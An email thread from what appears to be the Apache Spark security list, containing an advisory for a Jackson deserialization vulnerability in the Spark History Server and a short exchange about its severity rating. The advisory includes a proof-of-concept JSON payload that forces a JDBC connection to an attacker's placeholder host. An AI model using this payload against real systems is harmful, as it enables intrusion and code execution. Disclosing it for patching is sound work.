Thank you kindly sir Best, Tres
Sent from [Proton Mail](https://proton.me/mail/home) for iOS. -------- Original Message -------- On Wednesday, 03/18/26 at 09:18 Holden Karau <[email protected]> wrote: > Hi Tres, > > It was initially reported as high but I updated it to low after looking at > how difficult it was trigger (existing user required relatively high > permissions), but looks like there was an additional field to update. I’ll > take a look and see what I can do to update that. > > Cheers, > > Holden > > Twitter: https://twitter.com/holdenkarau > Fight Health Insurance: > [https://www.fighthealthinsurance.com/](https://www.fighthealthinsurance.com/?q=hk_email) > Books (Learning Spark, High Performance Spark, etc.): https://amzn.to/2MaRAG9 > YouTube Live Streams: https://www.youtube.com/user/holdenkarau > Pronouns: she/her > > On Wed, Mar 18, 2026 at 6:12 AM Tres Pittman <[email protected]> wrote: > >> Hi Holden >> >> Why does your email say severity is Low? >> >> According to GitHub and other sources, severity is actually High >> >> Best, >> Tres >> >> Sent from Proton Mail for iOS. >> >> -------- Original Message -------- >> On Friday, 03/13/26 at 16:14 Holden Karau <[email protected]> wrote: >> Severity: low >> >> Affected versions: >> >> - Apache Spark (org.apache.spark:spark-core_2.13, >> org.apache.spark:spark-core_2.12) before 3.5.7 >> - Apache Spark (org.apache.spark:spark-core_2.13, >> org.apache.spark:spark-core_2.12) 4.0.0 before 4.0.1 >> >> Description: >> >> This issue affects Apache Spark: before 3.5.7 and 4.0.1. Users are >> recommended to upgrade to version 3.5.7 or 4.0.1 and above, which fixes the >> issue. >> >> Summary >> >> Apache Spark 3.5.4 and earlier versions contain a code execution >> vulnerability in the Spark History Web UI due to overly permissive Jackson >> deserialization of event log data. This allows an attacker with access to >> the Spark event logs directory to inject malicious JSON payloads that >> trigger deserialization of arbitrary classes, enabling command execution on >> the host running the Spark History Server. >> >> Details >> >> The vulnerability arises because the Spark History Server uses Jackson >> polymorphic deserialization with @JsonTypeInfo.Id.CLASS on >> SparkListenerEvent objects, allowing an attacker to specify arbitrary class >> names in the event JSON. This behavior permits instantiating unintended >> classes, such as org.apache.hive.jdbc.HiveConnection, which can perform >> network calls or other malicious actions during deserialization. >> >> The attacker can exploit this by injecting crafted JSON content into the >> Spark event log files, which the History Server then deserializes on startup >> or when loading event logs. For example, the attacker can force the History >> Server to open a JDBC connection to a remote attacker-controlled server, >> demonstrating remote command injection capability. >> >> Proof of Concept: >> >> 1. Run Spark with event logging enabled, writing to a writable directory >> (spark-logs). >> >> 2. Inject the following JSON at the beginning of an event log file: >> >> { >> >> "Event": "org.apache.hive.jdbc.HiveConnection", >> "uri": "jdbc:hive2://<IP>:<PORT>/", >> "info": { >> "hive.metastore.uris": "thrift://<IP>:<PORT>" >> } >> } >> >> 3. Start the Spark History Server with logs pointing to the modified >> directory. >> >> 4. The Spark History Server initiates a JDBC connection to the attacker’s >> server, confirming the injection. >> >> Impact >> >> An attacker with write access to Spark event logs can execute arbitrary code >> on the server running the History Server, potentially compromising the >> entire system. >> >> This issue is being tracked as SPARK-52381 >> >> Credit: >> >> Alexandre Pujol (Linagora) (finder) >> >> References: >> >> https://github.com/apache/spark/pull/51312 >> https://github.com/apache/spark/pull/51323 >> https://issues.apache.org/jira/browse/SPARK-52381 >> https://spark.apache.org/ >> https://www.cve.org/CVERecord?id=CVE-2025-54920 >> https://issues.apache.org/jira/browse/SPARK-52381 >> >> --------------------------------------------------------------------- >> To unsubscribe e-mail: [email protected] >> >> --------------------------------------------------------------------- >> To unsubscribe e-mail: [email protected]
